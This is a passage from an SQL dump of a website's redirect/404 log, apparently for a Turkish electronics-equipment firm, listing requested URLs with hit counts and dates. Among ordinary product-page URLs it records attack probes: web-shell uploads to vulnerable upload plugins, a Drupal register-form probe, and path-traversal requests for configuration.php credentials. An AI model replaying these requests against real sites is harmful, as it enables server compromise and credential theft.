00:00:00',301),(19546,'http://3s-technologies.com.tr/tr/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/data.php',NULL,'','',2,0,'2018-04-16 01:57:22','0000-00-00 00:00:00',301),(19547,'http://3s-technologies.com.tr/tr/zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/izo.php',NULL,'','',2,0,'2018-04-16 01:57:22','0000-00-00 00:00:00',301),(19548,'http://3s-technologies.com.tr/admin/editor/plugins/ajaxfilemanager/ajax_create_folder.php',NULL,'','',2,0,'2018-04-16 01:57:23','0000-00-00 00:00:00',301),(19549,'http://3s-technologies.com.tr/tr/admin/editor/plugins/ajaxfilemanager/inc/data.php',NULL,'','',2,0,'2018-04-16 01:57:24','0000-00-00 00:00:00',301),(19550,'http://3s-technologies.com.tr/tr/admin/editor/plugins/ajaxfilemanager/inc/izo.php',NULL,'','',2,0,'2018-04-16 01:57:24','0000-00-00 00:00:00',301),(19551,'http://3s-technologies.com.tr/server/php/',NULL,'','',2,0,'2018-04-16 01:57:26','0000-00-00 00:00:00',301),(19552,'http://3s-technologies.com.tr/tr/server/php/files/ddd.php',NULL,'','',2,0,'2018-04-16 01:57:27','0000-00-00 00:00:00',301),(19553,'http://3s-technologies.com.tr/adminside/server/php/',NULL,'','',2,0,'2018-04-16 01:57:28','0000-00-00 00:00:00',301),(19554,'http://3s-technologies.com.tr/tr/images/block/ddd.php',NULL,'','',2,0,'2018-04-16 01:57:28','0000-00-00 00:00:00',301),(19555,'http://3s-technologies.com.tr/vehiculo_photos/server/php/',NULL,'','',2,0,'2018-04-16 01:57:29','0000-00-00 00:00:00',301),(19556,'http://3s-technologies.com.tr/tr/vehiculo_photos/server/php/files/ddd.php',NULL,'','',2,0,'2018-04-16 01:57:30','0000-00-00 00:00:00',301),(19557,'http://3s-technologies.com.tr/tr/tpl/plugins/upload9.1.0/server/php/files/ddd.php',NULL,'','',2,0,'2018-04-16 01:57:32','0000-00-00 00:00:00',301),(19558,'http://3s-technologies.com.tr/public/upload_nhieuanh/server/php/_index.php',NULL,'','',2,0,'2018-04-16 01:57:33','0000-00-00 00:00:00',301),(19559,'http://3s-technologies.com.tr/tr/public/upload_nhieuanh/server/php/files/ddd.php',NULL,'','',2,0,'2018-04-16 01:57:35','0000-00-00 00:00:00',301),(19560,'http://3s-technologies.com.tr/assets/global/plugins/jquery-file-upload/server/php/',NULL,'','',2,0,'2018-04-16 01:57:36','0000-00-00 00:00:00',301),(19561,'http://3s-technologies.com.tr/tr/assets/global/plugins/jquery-file-upload/server/php/files/ddd.php',NULL,'','',2,0,'2018-04-16 01:57:37','0000-00-00 00:00:00',301),(19562,'http://3s-technologies.com.tr/web/image/upload.php',NULL,'','',2,0,'2018-04-16 01:57:40','0000-00-00 00:00:00',301),(19563,'http://3s-technologies.com.tr/tr/web/image/images/ddd.php',NULL,'','',2,0,'2018-04-16 01:57:41','0000-00-00 00:00:00',301),(19564,'http://3s-technologies.com.tr/androidfileupload/fileupload.php',NULL,'','',2,0,'2018-04-16 01:57:42','0000-00-00 00:00:00',301),(19565,'http://3s-technologies.com.tr/tr/androidfileupload/uploads/ddd.php',NULL,'','',2,0,'2018-04-16 01:57:42','0000-00-00 00:00:00',301),(19566,'http://3s-technologies.com.tr/fckeditor/editor/filemanager/connectors/php/connector.php?command=fileupload&type=file&currentfolder=/',NULL,'','',2,0,'2018-04-16 01:57:44','0000-00-00 00:00:00',301),(19567,'http://3s-technologies.com.tr/tr/userfiles/file/izocin.txt',NULL,'','',2,0,'2018-04-16 01:57:45','0000-00-00 00:00:00',301),(19568,'http://3s-technologies.com.tr/plugins/fckeditor/editor/filemanager/connectors/php/upload.php',NULL,'','',2,0,'2018-04-16 01:57:49','0000-00-00 00:00:00',301),(19569,'http://3s-technologies.com.tr/tr/ficheiros/conteudos/izocin.txt',NULL,'','',2,0,'2018-04-16 01:57:55','0000-00-00 00:00:00',301),(19570,'http://3s-technologies.com.tr/tr/cache/c4e758b00c25ade40a8d29c6cccef6c4.php',NULL,'','',2,0,'2018-04-16 01:57:59','0000-00-00 00:00:00',301),(19571,'http://3s-technologies.com.tr/tr/cache/external_c4e758b00c25ade40a8d29c6cccef6c4.php',NULL,'','',2,0,'2018-04-16 01:57:59','0000-00-00 00:00:00',301),(19572,'http://3s-technologies.com.tr/tr/scripts/cache/a4ce43189bad3bf230bc792224d8c60c.php5',NULL,'','',2,0,'2018-04-16 01:58:03','0000-00-00 00:00:00',301),(19573,'http://3s-technologies.com.tr/tr/scripts/cache/external_a4ce43189bad3bf230bc792224d8c60c.php5',NULL,'','',2,0,'2018-04-16 01:58:05','0000-00-00 00:00:00',301),(19574,'http://3s-technologies.com.tr/tr/cache/a4ce43189bad3bf230bc792224d8c60c.php5',NULL,'','',2,0,'2018-04-16 01:58:07','0000-00-00 00:00:00',301),(19575,'http://3s-technologies.com.tr/tr/cache/external_a4ce43189bad3bf230bc792224d8c60c.php5',NULL,'','',2,0,'2018-04-16 01:58:08','0000-00-00 00:00:00',301),(19576,'http://3s-technologies.com.tr/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php',NULL,'','',2,0,'2018-04-16 01:58:09','0000-00-00 00:00:00',301),(19577,'http://3s-technologies.com.tr/tr/jscripts/tiny_mce/plugins/ajaxfilemanager/inc/data.php',NULL,'','',2,0,'2018-04-16 01:58:09','0000-00-00 00:00:00',301),(19578,'http://3s-technologies.com.tr/tr/jscripts/tiny_mce/plugins/ajaxfilemanager/inc/izo.php',NULL,'','',2,0,'2018-04-16 01:58:10','0000-00-00 00:00:00',301),(19579,'http://3s-technologies.com.tr/actions/beats_uploader.php',NULL,'','',2,0,'2018-04-16 01:58:11','0000-00-00 00:00:00',301),(19580,'http://www.3s-technologies.com.tr/en/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php','',1,0,'2018-04-16 02:14:01','0000-00-00 00:00:00',301),(19581,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,category_name/dirdesc/results,1-5?language=en-gb',NULL,'','',5,0,'2018-04-16 02:20:23','0000-00-00 00:00:00',301),(19582,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_name/results,1-10',NULL,'','',8,0,'2018-04-16 02:27:35','0000-00-00 00:00:00',301),(19583,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,category_name/results,1-20?language=en-gb',NULL,'','',6,0,'2018-04-16 03:25:10','0000-00-00 00:00:00',301),(19584,'http://3s-technologies.com.tr/en/products/dalga-lehim/by,product_sku/results,1-10?language=en-gb',NULL,'','',1,0,'2018-04-16 03:39:35','0000-00-00 00:00:00',301),(19585,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,ordering',NULL,'','',1,0,'2018-04-16 04:58:47','0000-00-00 00:00:00',301),(19586,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,category_name/results,1-20',NULL,'','',1,0,'2018-04-16 06:16:49','0000-00-00 00:00:00',301),(19587,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,category_name/results,1-10',NULL,'','',1,0,'2018-04-16 08:47:46','0000-00-00 00:00:00',301),(19588,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,category_name/dirdesc/results,6-25',NULL,'','',16,0,'2018-04-16 10:09:03','0000-00-00 00:00:00',301),(19589,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/dirdesc/results,1-30?error=404',NULL,'','',4,0,'2018-04-16 12:28:24','0000-00-00 00:00:00',301),(19590,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,category_name/results,1-20',NULL,'','',2,0,'2018-04-16 12:51:38','0000-00-00 00:00:00',301),(19591,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,mf_name/dirdesc/results,6-15',NULL,'','',8,0,'2018-04-16 13:38:05','0000-00-00 00:00:00',301),(19592,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,category_name/results,1-50',NULL,'','',1,0,'2018-04-16 13:49:41','0000-00-00 00:00:00',301),(19593,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,category_name/results,1-50',NULL,'','',1,0,'2018-04-16 14:12:55','0000-00-00 00:00:00',301),(19594,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/by,product_name/results,1-30?error=404',NULL,'','',5,0,'2018-04-16 14:24:32','0000-00-00 00:00:00',301),(19595,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_name/dirdesc/results,1-20?language=en-gb',NULL,'','',1,0,'2018-04-16 17:18:43','0000-00-00 00:00:00',301),(19596,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',3,0,'2018-04-16 18:40:00','0000-00-00 00:00:00',301),(19597,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,category_name/dirdesc/results,6-55?language=en-gb',NULL,'','',5,0,'2018-04-16 20:47:45','0000-00-00 00:00:00',301),(19598,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_name/dirdesc/results,1-5?language=en-gb',NULL,'','',1,0,'2018-04-16 21:22:35','0000-00-00 00:00:00',301),(19599,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/temizleme-makineleri/results,1-10?language=en-gb&filter_product=',NULL,'','',1,0,'2018-04-17 00:44:43','0000-00-00 00:00:00',301),(19600,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,category_name/results,1-5',NULL,'','',2,0,'2018-04-17 03:01:07','0000-00-00 00:00:00',301),(19601,'http://3s-technologies.com.tr/tr/administrator/components/com_users/views/debuggroup/tmpl/lib.php',NULL,'','',2,0,'2018-04-17 09:45:13','0000-00-00 00:00:00',301),(19602,'http://3s-technologies.com.tr/tr/administrator/components/com_users/views/debuggroup/tmpl/form.php',NULL,'','',2,0,'2018-04-17 09:45:13','0000-00-00 00:00:00',301),(19603,'http://3s-technologies.com.tr/tr/administrator/components/com_users/views/level/tmpl/lib.php',NULL,'','',2,0,'2018-04-17 09:45:13','0000-00-00 00:00:00',301),(19604,'http://3s-technologies.com.tr/tr/administrator/components/com_users/views/user/tmpl/task.php',NULL,'','',2,0,'2018-04-17 09:45:13','0000-00-00 00:00:00',301),(19605,'http://3s-technologies.com.tr/tr/administrator/components/com_users/views/users/tmpl/file.php',NULL,'','',2,0,'2018-04-17 09:45:13','0000-00-00 00:00:00',301),(19606,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&itemid=55&lang=tr',NULL,'','',27,0,'2018-04-17 11:03:01','0000-00-00 00:00:00',301),(19607,'http://3s-technologies.com.tr/en/freichat/client/plugins/upload/upload.php',NULL,'http://3s-technologies.com.tr/freichat/client/plugins/upload/upload.php','',10,0,'2018-04-17 14:56:36','0000-00-00 00:00:00',301),(19608,'http://3s-technologies.com.tr/tr/гјrгјnler',NULL,'','',7,0,'2018-04-17 17:23:17','0000-00-00 00:00:00',301),(19609,'http://3s-technologies.com.tr/tr/freichat/client/plugins/upload/upload.php',NULL,'http://3s-technologies.com.tr/tr/freichat/client/plugins/upload/upload.php','',35,0,'2018-04-18 05:35:47','0000-00-00 00:00:00',301),(19610,'http://www.3s-technologies.com.tr/en/images/urunler/t_mi300.jpg',NULL,'http://www.3s-technologies.com.tr/en/products-en/dalga-lehim/mi-300-detail','',38,0,'2018-04-18 07:31:35','0000-00-00 00:00:00',301),(19611,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hä±z',NULL,'','',2,0,'2018-04-18 18:52:07','0000-00-00 00:00:00',301),(19612,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/results,1-5',NULL,'','',1,0,'2018-04-19 08:54:49','0000-00-00 00:00:00',301),(19613,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_name/dirdesc/results,1-5',NULL,'','',1,0,'2018-04-19 10:13:33','0000-00-00 00:00:00',301),(19614,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_name/dirdesc/results,1-5',NULL,'','',6,0,'2018-04-19 13:44:20','0000-00-00 00:00:00',301),(19615,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,category_name/dirdesc/results,1-5',NULL,'','',4,0,'2018-04-19 14:27:52','0000-00-00 00:00:00',301),(19616,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_name/dirdesc/results,1-50',NULL,'','',1,0,'2018-04-19 16:46:18','0000-00-00 00:00:00',301),(19617,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_name/dirdesc/results,1-20',NULL,'','',3,0,'2018-04-19 18:24:01','0000-00-00 00:00:00',301),(19618,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_name/dirdesc/results,1-10',NULL,'','',1,0,'2018-04-19 20:37:44','0000-00-00 00:00:00',301),(19619,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,category_name/dirdesc/results,1-10',NULL,'','',1,0,'2018-04-19 23:17:09','0000-00-00 00:00:00',301),(19620,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,category_name/dirdesc/results,1-50',NULL,'','',1,0,'2018-04-20 02:37:43','0000-00-00 00:00:00',301),(19621,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/aqueous',NULL,'','',1,0,'2018-04-20 02:42:51','0000-00-00 00:00:00',301),(19622,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/dirdesc/results,1-10',NULL,'','',1,0,'2018-04-20 03:54:51','0000-00-00 00:00:00',301),(19623,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturers/aqueous',NULL,'','',7,0,'2018-04-20 03:59:59','0000-00-00 00:00:00',301),(19624,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku/dirdesc/results,1-50',NULL,'','',1,0,'2018-04-20 05:01:42','0000-00-00 00:00:00',301),(19625,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku',NULL,'','',3,0,'2018-04-20 06:13:42','0000-00-00 00:00:00',301),(19626,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,pc.ordering,product_name',NULL,'','',1,0,'2018-04-20 07:15:25','0000-00-00 00:00:00',301),(19627,'http://3s-technologies.com.tr/tr/images/vuln.php',NULL,'','',102,0,'2018-04-20 07:38:29','0000-00-00 00:00:00',301),(19628,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_sku/results,1-10',NULL,'','',6,0,'2018-04-20 18:22:47','0000-00-00 00:00:00',301),(19629,'http://www.3s-technologies.com.tr/tr/images/jdownloads/screenshots/rxrking.php3.g?rxr',NULL,'','',12,0,'2018-04-20 23:02:59','0000-00-00 00:00:00',301),(19630,'http://www.3s-technologies.com.tr/tr/components/com_jbcatalog/libraries/jsupload',NULL,'','',8,0,'2018-04-20 23:03:00','0000-00-00 00:00:00',301),(19631,'http://www.3s-technologies.com.tr/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../rxr_1524211940.php',NULL,'','',1,0,'2018-04-20 23:03:00','0000-00-00 00:00:00',301),(19632,'http://www.3s-technologies.com.tr/tr/components/rxr_1524211940.php',NULL,'','',1,0,'2018-04-20 23:03:01','0000-00-00 00:00:00',301),(19633,'http://www.3s-technologies.com.tr/tr/?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',8,0,'2018-04-20 23:03:01','0000-00-00 00:00:00',301),(19634,'http://www.3s-technologies.com.tr/tr/?option=com_macgallery&view=download&albumid=../../configuration.php',NULL,'','',6,0,'2018-04-20 23:03:04','0000-00-00 00:00:00',301),(19635,'http://www.3s-technologies.com.tr/tr/?option=com_joomanager&controller=details&task=download&path=configuration.php',NULL,'','',14,0,'2018-04-20 23:03:05','0000-00-00 00:00:00',301),(19636,'http://www.3s-technologies.com.tr/tr/?option=com_jtagmembersdirectory&task=attachment&download_file=/../../../../configuration.php',NULL,'','',1,0,'2018-04-20 23:03:05','0000-00-00 00:00:00',301),(19637,'http://www.3s-technologies.com.tr/tr/?option=com_facegallery&task=imagedownload&img_name=../../configuration.php',NULL,'','',1,0,'2018-04-20 23:03:06','0000-00-00 00:00:00',301),(19638,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j2_3/images/stories/virtuemart/product/resized/yaylar_200x200.jpg',NULL,'','',2,0,'2018-04-21 02:42:10','0000-00-00 00:00:00',301),(19639,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/user',NULL,'','',1,0,'2018-04-21 15:34:55','0000-00-00 00:00:00',301),(19640,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/ã¼rã¼nler/user',NULL,'','',1,0,'2018-04-21 16:14:33','0000-00-00 00:00:00',301),(19641,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,pc.ordering,product_name',NULL,'','',1,0,'2018-04-22 03:09:36','0000-00-00 00:00:00',301),(19642,'http://www.3s-technologies.com.tr/en/wp-content/plugins/revslider/temp/update_extract',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/revslider/temp/update_extract/','',1,0,'2018-04-22 04:15:46','0000-00-00 00:00:00',301),(19643,'https://www.3s-technologies.com.tr/en/nova-elektronik.com.tr/joomla/index.php?option=com_user&view=register',NULL,'https://www.3s-technologies.com.tr/nova-elektronik.com.tr/joomla/index.php?option=com_user&view=register','',3,0,'2018-04-22 21:15:41','0000-00-00 00:00:00',301),(19644,'http://3s-technologies.com.tr/tr/user/password',NULL,'','',4,0,'2018-04-22 22:08:33','0000-00-00 00:00:00',301),(19645,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/dirdesc/results,1-5',NULL,'','',3,0,'2018-04-22 23:32:11','0000-00-00 00:00:00',301),(19646,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/dirdesc/results,1-50',NULL,'','',1,0,'2018-04-23 05:04:09','0000-00-00 00:00:00',301),(19647,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/dirdesc/results,1-20',NULL,'','',1,0,'2018-04-23 06:30:32','0000-00-00 00:00:00',301),(19648,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/dirdesc/results,1-50',NULL,'','',2,0,'2018-04-23 08:54:34','0000-00-00 00:00:00',301),(19649,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/dirdesc/results,1-10',NULL,'','',1,0,'2018-04-23 10:06:34','0000-00-00 00:00:00',301),(19650,'http://3s-technologies.com.tr/tr/sitefinity/usercontrols/dialogs/documenteditordialog.aspx',NULL,'http://3s-technologies.com.tr/tr/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx','',2,0,'2018-04-23 10:24:48','0000-00-00 00:00:00',301),(19651,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/dirdesc/results,1-10',NULL,'','',1,0,'2018-04-23 12:59:19','0000-00-00 00:00:00',301),(19652,'http://3s-technologies.com.tr/en/sitefinity/usercontrols/dialogs/documenteditordialog.aspx',NULL,'http://3s-technologies.com.tr/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx','',2,0,'2018-04-23 13:16:15','0000-00-00 00:00:00',301),(19653,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/dirdesc/results,1-20',NULL,'','',1,0,'2018-04-23 14:11:19','0000-00-00 00:00:00',301),(19654,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/by,product_sku/results,1-10',NULL,'','',1,0,'2018-04-23 14:30:36','0000-00-00 00:00:00',301),(19655,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/dirdesc/results,1-5',NULL,'','',3,0,'2018-04-23 22:54:38','0000-00-00 00:00:00',301),(19656,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,mf_name/dirdesc/results,1-60',NULL,'','',3,0,'2018-04-24 04:32:54','0000-00-00 00:00:00',301),(19657,'http://3s-technologies.com.tr/tr/administrator/components/com_simplephotogallery/lib/uploadfile.php',NULL,'http://3s-technologies.com.tr/tr/administrator/components/com_simplephotogallery/lib/uploadFile.php','',5,0,'2018-04-24 05:33:24','0000-00-00 00:00:00',301),(19658,'http://3s-technologies.com.tr/en/administrator/components/com_simplephotogallery/lib/uploadfile.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_simplephotogallery/lib/uploadFile.php','',2,0,'2018-04-24 08:24:51','0000-00-00 00:00:00',301),(19659,'https://www.3s-technologies.com.tr/en/products/thru-hole/rl132-detail',NULL,'','',1,0,'2018-04-24 08:25:44','0000-00-00 00:00:00',301),(19660,'http://3s-technologies.com.tr/blog/xmlrpc.php',NULL,'','',15,0,'2018-04-24 15:00:47','0000-00-00 00:00:00',301),(19661,'http://3s-technologies.com.tr/xmlrpc.php',NULL,'','',55,0,'2018-04-24 15:00:47','0000-00-00 00:00:00',301),(19662,'http://3s-technologies.com.tr/user/register?element_parents=account/mail/#value&ajax_form=1&_wrapper_format=drupal_ajax',NULL,'','',5,0,'2018-04-25 02:03:43','0000-00-00 00:00:00',301),(19663,'http://3s-technologies.com.tr/tr/payload.php',NULL,'','',4,0,'2018-04-25 02:03:53','0000-00-00 00:00:00',301),(19664,'http://www.3s-technologies.com.tr/en/administrator/components/com_bt_portfolio/bt_portfolio.xml',NULL,'http://www.3s-technologies.com.tr/administrator/components/com_bt_portfolio/bt_portfolio.xml','',1,0,'2018-04-25 04:23:28','0000-00-00 00:00:00',301),(19665,'http://www.3s-technologies.com.tr/en/components/com_sexycontactform/fileupload/index.php',NULL,'http://www.3s-technologies.com.tr/components/com_sexycontactform/fileupload/index.php','',2,0,'2018-04-25 09:14:30','0000-00-00 00:00:00',301),(19666,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/2.-el-makineler/by,category_name?language=en-gb',NULL,'','',2,0,'2018-04-25 11:43:15','0000-00-00 00:00:00',301),(19667,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/2.-el-makineler/by,mf_name?language=en-gb',NULL,'','',2,0,'2018-04-25 11:43:20','0000-00-00 00:00:00',301),(19668,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/2.-el-makineler/by,product_name?language=en-gb',NULL,'','',2,0,'2018-04-25 11:43:22','0000-00-00 00:00:00',301),(19669,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/2.-el-makineler/by,product_sku?language=en-gb',NULL,'','',2,0,'2018-04-25 11:43:26','0000-00-00 00:00:00',301),(19670,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/2.-el-makineler/dirdesc?language=en-gb',NULL,'','',2,0,'2018-04-25 11:43:29','0000-00-00 00:00:00',301),(19671,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/bölgesel-lehimleme/dirdesc',NULL,'','',213,0,'2018-04-25 11:43:32','0000-00-00 00:00:00',301),(19672,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/dalga-lehim/by,category_name?language=en-gb',NULL,'','',2,0,'2018-04-25 11:43:34','0000-00-00 00:00:00',301),(19673,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/dalga-lehim/by,mf_name?language=en-gb',NULL,'','',2,0,'2018-04-25 11:43:37','0000-00-00 00:00:00',301),(19674,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/dalga-lehim/by,product_name?language=en-gb',NULL,'','',2,0,'2018-04-25 11:43:39','0000-00-00 00:00:00',301),(19675,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/dalga-lehim/by,product_sku?language=en-gb',NULL,'','',2,0,'2018-04-25 11:43:42','0000-00-00 00:00:00',301),(19676,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/dalga-lehim/dirdesc?language=en-gb',NULL,'','',2,0,'2018-04-25 11:43:45','0000-00-00 00:00:00',301),(19677,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/flux/by,category_name?language=en-gb',NULL,'','',2,0,'2018-04-25 11:43:49','0000-00-00 00:00:00',301),(19678,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/flux/by,mf_name?language=en-gb',NULL,'','',2,0,'2018-04-25 11:43:53','0000-00-00 00:00:00',301),(19679,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/flux/by,product_name?language=en-gb',NULL,'','',2,0,'2018-04-25 11:44:03','0000-00-00 00:00:00',301),(19680,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/flux/by,product_sku?language=en-gb',NULL,'','',2,0,'2018-04-25 11:44:08','0000-00-00 00:00:00',301),(19681,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturers/ddm-novastar',NULL,'','',2,0,'2018-04-25 11:44:11','0000-00-00 00:00:00',301),(19682,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturers/kester',NULL,'','',2,0,'2018-04-25 11:44:13','0000-00-00 00:00:00',301),(19683,'http://3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145&itemid=147&lang=tr',NULL,'','',2,0,'2018-04-25 11:48:45','0000-00-00 00:00:00',301),(19684,'http://3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146&itemid=148&lang=tr',NULL,'','',2,0,'2018-04-25 11:48:47','0000-00-00 00:00:00',301),(19685,'http://3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147&itemid=146&lang=tr',NULL,'','',2,0,'2018-04-25 11:48:49','0000-00-00 00:00:00',301),(19686,'http://3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149&itemid=150&lang=en',NULL,'','',2,0,'2018-04-25 11:48:52','0000-00-00 00:00:00',301),(19687,'http://3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150&itemid=151&lang=en',NULL,'','',2,0,'2018-04-25 11:48:56','0000-00-00 00:00:00',301),(19688,'http://3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151&itemid=152&lang=en',NULL,'','',2,0,'2018-04-25 11:48:58','0000-00-00 00:00:00',301),(19689,'http://3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152&itemid=153&lang=en',NULL,'','',2,0,'2018-04-25 11:48:59','0000-00-00 00:00:00',301),(19690,'http://3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153&itemid=154&lang=en',NULL,'','',2,0,'2018-04-25 11:49:02','0000-00-00 00:00:00',301),(19691,'http://3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&itemid=144&lang=tr',NULL,'','',2,0,'2018-04-25 11:49:04','0000-00-00 00:00:00',301),(19692,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturers/ddm-novastar',NULL,'','',10,0,'2018-04-25 11:51:46','0000-00-00 00:00:00',301),(19693,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturers/kester',NULL,'','',10,0,'2018-04-25 11:51:51','0000-00-00 00:00:00',301),(19694,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/stencil-washer-eco-detail?tmpl=component&print=1',NULL,'','',2,0,'2018-04-25 11:52:02','0000-00-00 00:00:00',301),(19695,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/temizleme-makineleri/stencil-washer-eco-detail',NULL,'','',2,0,'2018-04-25 11:52:04','0000-00-00 00:00:00',301),(19696,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturers/ddm-novastar',NULL,'','',5,0,'2018-04-25 11:54:17','0000-00-00 00:00:00',301),(19697,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturers/kester',NULL,'','',5,0,'2018-04-25 11:54:23','0000-00-00 